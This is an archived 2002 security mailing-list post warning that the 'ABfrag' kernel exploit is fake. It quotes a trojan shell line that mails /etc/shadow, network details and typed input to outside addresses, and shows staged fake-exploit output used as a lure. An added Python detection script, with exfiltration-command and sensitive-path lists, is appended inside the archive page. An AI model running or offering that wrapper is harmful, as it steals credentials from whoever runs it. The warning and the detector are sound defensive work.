Re: Linux Kernel Exploits / ABFrag

From: Muhammad Faisal Rauf Danka (mfrdat_private)
Date: Fri Oct 18 2002 - 23:04:33 PDT


    Read that related news: 
    <quote> 
    A message posted on the Security Mailing list BugTraq about an exploit for Linux kernels "ABFrags" has turned out to be a fake. Rumors about "abfrags.c", that would use a security hole in the TCP/IP stack, have been spreading for weeks on the chat network efnet, although at that time it was supposed to be an exploit for FreeBSD kernels. 
    </quote> 
    
    link: http://www.heise.de/english/newsticker/data/jk-18.10.02-006/ 
    
    Previously there was a binary out by the name "syncthis", which looked somewhat the same, but actually ran this behind it: 
    
    #!/bin/sh 
    (/sbin/ifconfig;cat /etc/shadow; cat) | /bin/mail -s $HOSTNAME b4shb0yat_private -c B1tchat_private >/dev/null 2>/dev/null 
    
    It claimed to be a Linux tcp stack exploit. 
    
    McKenzy Wihle GSH security - 9/01/02: 
    Remote kernel tcp packet sync bug. Check GSH main dir for whitepaper. 
    This bug does not leave GSH labs until further notice. 
    
    update: 
    9/03/02 - got response from George Weenste, NSA coordinated fix release 
    and vulnerability disclosure to come in December 2002 linux kernel developers warned 
    
    --- WARNING: Will not fail on most errors, read whitepaper for proper use. --- 
    
    READ WHITEPAPER! - no args 
    
    
    Its password was "nsasucks" 
    
    Has anyone tried that on the abfrag binary? 
    
    ABfrag posers are pasting this on irc sessions to initiate trades, and eventually get access to your host. 
    
    server@thebox:~$ ./ABfrag.bin -d 192.168.1.20 
    
    ---------------------------------------------------------------------------- 
    ABfrag - Linux Kernel ( <= 2.4.20pre20 ) Remote Syncing Exploit 
    Found and coded by Ac1db1tch3z - t3kn10n, n0n3 and t3kn0h03. 
    WARNING: 
    Unlicensed usage and/or distribution of this program carries heavy fines and penalties under American, British, European and International copyright law. 
    Should you find this program on any compromised system we 
    urge you to delete this binary rather than attempt distribution or analysis. 
    Such actions would be both unlawful and unwise. 
    
    ---------------------------------------------------------------------------- 
    password: 
    * Finding local offsets (for sync with remote kernel). 
    * Finding remote time intervals...567ms per packet 
    * repairing LKM source into shellcode 
    * Obtained socket for connect back 
    -- Sending Racer PACKET complete! -- 
    .............................................CONNECT BACK 
    FAILED! 
    FIXING! 
    Fixed timing at 0x8453fffe 
    bash# id 
    uid=0(root) gid=0(root) groups=11(httpd) 
    bash# w 
    6:01pm up 12 days, 17:06, 0 users, load average: 0.34, .26, 0.20 
    
    
    I think the person who cracked Mr Daniel's box might have uploaded this trojan later on, to use his box as a launch pad to attack more hosts, or just to try out this exploit too for the heck of it. 
    
    Does Mr Daniel have any snort dumps from while the attack occurred?
    
    
    Regards
    --------
    Muhammad Faisal Rauf Danka
    
    Head of GemSEC / Chief Technology Officer
    Gem Internet Services (Pvt) Ltd.
    web: www.gem.net.pk
    Key Id: 0x784B0202
    Key Fingerprint: 6F8C EDCF 6C6E 06A5 48D7 6A20 C592 484B 784B 0202
    
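As an added example from the defender's side (not part of the original post, nor of any tool or binary it mentions), the following Python script statically triages a shell script that claims to be an exploit and flags the pattern of the "syncthis" wrapper quoted above: sensitive files read and piped into an outbound mail command, host reconnaissance commands, and a bare `cat` that forwards whatever the operator types at the fake "password" prompt into the same mail. The sensitive-path and command lists are my assumptions, not anything the thread defines; the first sample input is constructed from the quoted script (with the addresses left obfuscated as they appear there), and the second is a constructed harmless report script for contrast.

```python
"""Static triage of a shell script that claims to be an exploit.

Added example, not from the original post. It looks for the "syncthis"
pattern: read credential files, pipe them to an outbound command, and
capture whatever the operator types on stdin along the way.
"""
from __future__ import annotations

import re
import shlex
from dataclasses import dataclass, field

# Assumed lists (not from the thread): files that should never leave the host
# through a self-described "exploit", and commands that move data off-box.
SENSITIVE_PATHS = ("/etc/shadow", "/etc/passwd", "/etc/gshadow",
                   "/etc/master.passwd", "/root/.ssh")
EXFIL_COMMANDS = {"mail", "mailx", "sendmail", "nc", "netcat",
                  "curl", "wget", "ftp", "telnet"}
RECON_COMMANDS = {"ifconfig", "uname", "hostname", "netstat", "w", "id"}

# Verdicts ordered from least to most severe.
SEVERITY = ["clean", "sensitive-read", "outbound-channel",
            "credential-exfiltration"]


@dataclass
class Finding:
    line_no: int
    reads: list[str] = field(default_factory=list)
    exfil: list[str] = field(default_factory=list)
    recon: list[str] = field(default_factory=list)
    # True when a bare `cat` (no file argument) feeds an exfil command:
    # anything the user types at a fake prompt is forwarded too.
    stdin_capture: bool = False

    @property
    def verdict(self) -> str:
        if self.reads and self.exfil:
            return "credential-exfiltration"
        if self.exfil:
            return "outbound-channel"
        if self.reads:
            return "sensitive-read"
        return "clean"


def _commands(line: str) -> list[list[str]]:
    """Split one shell line on |, ||, ;, && into argv lists.

    Grouping parentheses are dropped so "(a; b) | c" yields a, b, c.
    """
    stripped = line.replace("(", " ").replace(")", " ")
    argvs = []
    for segment in re.split(r"\|\||&&|[|;]", stripped):
        try:
            words = shlex.split(segment, comments=True)
        except ValueError:  # unbalanced quotes: fall back to a plain split
            words = segment.split()
        if words:
            argvs.append(words)
    return argvs


def analyse(script: str) -> list[Finding]:
    """Return one Finding per non-clean line of the script."""
    findings = []
    for n, line in enumerate(script.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue  # blank line, comment or shebang
        f = Finding(n)
        argvs = _commands(line)
        for argv in argvs:
            cmd = argv[0].rsplit("/", 1)[-1]  # /bin/mail -> mail
            if cmd in EXFIL_COMMANDS:
                f.exfil.append(cmd)
            if cmd in RECON_COMMANDS:
                f.recon.append(cmd)
            for arg in argv[1:]:
                if any(arg.startswith(p) for p in SENSITIVE_PATHS):
                    f.reads.append(arg)
        f.stdin_capture = any(argv == ["cat"] for argv in argvs) and bool(f.exfil)
        if f.verdict != "clean":
            findings.append(f)
    return findings


def triage(script: str) -> str:
    """Worst verdict across the whole script."""
    verdicts = [f.verdict for f in analyse(script)] or ["clean"]
    return max(verdicts, key=SEVERITY.index)


# Constructed from the wrapper quoted in the thread (addresses as obfuscated there).
SYNCTHIS_SAMPLE = r"""#!/bin/sh
(/sbin/ifconfig;cat /etc/shadow; cat) | /bin/mail -s $HOSTNAME b4shb0yat_private -c B1tchat_private >/dev/null 2>/dev/null
"""

# Constructed harmless contrast: mail alone is only an outbound channel.
BENIGN_SAMPLE = r"""#!/bin/sh
uptime
df -h | mail -s "disk report" admin@localhost
"""

if __name__ == "__main__":
    for name, sample in (("syncthis", SYNCTHIS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, "->", triage(sample))
        for f in analyse(sample):
            print(f"  line {f.line_no}: reads={f.reads} exfil={f.exfil} "
                  f"recon={f.recon} stdin_capture={f.stdin_capture}")
```

The contrast matters in practice: a mail or curl command on its own only says the script talks outbound, while the combination of a credential-file read feeding that command is what turns a "proof of concept" into a harvester. The `stdin_capture` flag is the detail worth remembering from this thread: a wrapper that prompts for a password and has a bare `cat` in the pipeline mails the typed password along with the shadow file.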
    



    This archive was generated by hypermail 2b30 : Sat Oct 19 2002 - 15:02:31 PDT